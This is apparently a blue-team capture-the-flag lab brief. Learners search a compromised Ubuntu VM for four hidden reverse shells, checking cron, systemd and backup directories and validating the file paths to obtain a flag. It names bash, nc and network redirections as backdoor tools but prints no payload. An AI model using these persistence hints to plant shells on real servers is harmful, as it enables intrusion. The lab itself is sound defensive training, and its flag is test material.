Reverse Shell Cleanup

Reverse Shell Cleanup

In this lab, you will face a live incident response scenario. A production Ubuntu server has been compromised, and attackers have left several active backdoors in the form of hidden reverse shells.

Your mission as a cybersecurity analyst is to locate the four shells, validate their paths, and help recover the server.

In this lab you will learn:

• Post-exploitation behavior analysis
• Searching for persistence in cron, systemd, and suspicious scripts
• Using Linux commands to track processes and files

🌱 How to start this lab

👉 This challenge uses a virtual machine designed for post-exploitation scenarios.

1. If you don't have it yet, download the virtual machine from this link:

1https://storage.googleapis.com/cybersecurity-machines/emergency-lab.ova

1. Import the virtual machine into VirtualBox or VMware.
2. Start the VM and log in as the default user. The terminal will already be active at the beginning of the exercise.

📄 Instructions

You have logged into a production Ubuntu server after the monitoring team detected suspicious outgoing traffic. It is suspected that the system was compromised by an attacker who left four hidden reverse shells. Your task is to find them, identify the exact path of each one, and validate them using the validator.py script.

Your mission: find the reverse shells

1. Explore the system using commands you would use if you suspected malicious activity. Think about tools to view processes, open files, or network connections:

   • find, grep, cat, ls, stat, crontab, systemctl, etc.

2. Reflect: what mechanisms allow a script to run automatically in Linux? Where would you look for signs of persistence? Examine possible persistence paths: /etc/cron.d/, /opt/, /usr/local/bin/, /var/backups/, /lib/systemd/system/, etc.

3. Some attackers don't create files with strange names. Sometimes they disguise their scripts with generic names that look legitimate. If a file seems harmless but includes instructions to establish an outbound connection from the server, it may deserve a closer look.

4. Explore paths that are often overlooked in a superficial review: directories used for backups, custom scripts, or internal tools.

5. Remember that attackers often use commands like bash, nc, or network redirections to open backdoors. But they don't always put them at the beginning of the script...

6. Identify the absolute path of all 4 shells.

7. Run the validator and provide the paths one by one:

1validate-lab

If the paths are correct, you will see a message like this:

1✅ Well done! You've cleaned the server.
2🎁 Flag: FLAG{FLAG_01}

Now it's your turn to think like a true Blue Team analyst. Recovering the server depends on you!

Good luck, Analyst!